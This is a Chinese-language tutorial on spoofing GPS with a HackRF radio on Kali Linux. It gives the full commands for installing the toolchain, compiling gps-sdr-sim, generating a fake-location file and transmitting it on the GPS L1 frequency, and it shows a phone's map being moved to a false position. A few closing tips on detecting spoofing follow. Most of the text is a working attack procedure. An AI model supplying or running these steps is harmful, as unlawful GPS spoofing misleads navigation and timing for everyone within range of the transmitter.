劫持準(zhǔn)備
設(shè)備：hackrf
系統(tǒng)環(huán)境：kali linux
1. 打開終端，在終端中輸入以下命令，在kali下安裝hackrf的驅(qū)動和環(huán)境。
sudo apt-get install hackrf libhackrf-dev libhackrf0
2. 安裝完畢，插上hackrf，運(yùn)行以下命令
hackrf_info
可查看hackrf的基本情況如下所示：

3. 接下來安裝一些其他軟件，在終端輸入以下命令，就會將所需要的軟件安裝成功：
apt-get install gnuradio gnuradio-dev gr-osmosdr gr-osmosdr gqrx-sdr wireshark
4. 安裝成功后，就可以將hackrf的GPS外部時(shí)鐘安裝上，安裝的圖片如下所示：

5. 安裝完畢之后，接上相應(yīng)的天線連接完畢之后如下所示：

制作定位文件
1. 從git上面下載所需的軟件gps-sdr-sim并且對這個(gè)軟件進(jìn)行編譯，生成可執(zhí)行文件。在終端輸入如下命令即可：
Git clone https://github.com/osqzss/gps-sdr-sim.git
cd gps-sdr-sim
gcc gpssim.c -lm -O3 -o gps-sdr-sim
2. 挑選一個(gè)經(jīng)緯度，這里選擇經(jīng)度66°，緯度66°。在當(dāng)前目錄下，終端上執(zhí)行如下命令，制作定位文件：
./gps-sdr-sim -e brdc3540.14n -l 66,66,100 -b 8 -d 100
實(shí)施劫持
讓hackrf將這個(gè)文件中的內(nèi)容發(fā)射出去。
這里需要注意的是由于現(xiàn)在的手機(jī)基本上都采用GPS定位，基站網(wǎng)格定位，和Wifi定位3種方式合一，所以這里需要使手機(jī)處于飛行模式才可以。在終端輸入如下命令，其中1575420000指定的是發(fā)射的頻率，而2600000是采樣頻率：
hackrf_transfer -t gpssim.bin -f 1575420000 -s 2600000 -a 1 -x 0

我們可以發(fā)現(xiàn)，在欺騙成功后，連接的衛(wèi)星數(shù)量會有明顯的上升。這是因?yàn)槲覀兗倜傲似渲泻芏嗟男l(wèi)星。

GPS劫持前網(wǎng)絡(luò)安全通

GPS劫持后
現(xiàn)在可以看到，GPS劫持后，百度地圖定位結(jié)果已經(jīng)不對了，

Tips
GPS有風(fēng)險(xiǎn)，使用時(shí)我們該如何分辨GPS的真?zhèn)文兀?/span>
1. 根據(jù)GPS信號的強(qiáng)度區(qū)分。如果GPS的欺騙信號是從單一的設(shè)備中發(fā)出的，那么其信號的強(qiáng)度很可能是一直的，而在正常的通訊環(huán)境下，不同GPS信號不會有如此相似的信號強(qiáng)度。
2. 根據(jù)GPS信號數(shù)目區(qū)分。因?yàn)镚PS信號是偽造出來的，而且需要至少偽造出來三個(gè)，而一般地來說，為了使得欺騙成功，偽造的GPS信號數(shù)目是越多越好的，所以如果GPS信號的數(shù)目突然增加了很多，那么很可能遭到了GPS欺騙。
3. 根據(jù)時(shí)間區(qū)分。GPS信號具有衛(wèi)星授時(shí)的功能。而GPS信號的偽造一般需要獲取到某一天GPS衛(wèi)星的運(yùn)行報(bào)文，在這個(gè)基礎(chǔ)上進(jìn)行偽造。所以這樣的偽造出來的衛(wèi)星授時(shí)的時(shí)間一定是所采用報(bào)文的時(shí)間而不是正常時(shí)間，所以在聯(lián)網(wǎng)設(shè)備中只需要對衛(wèi)星授時(shí)時(shí)間進(jìn)行比對，就可以知道是否遭到了GPS欺騙。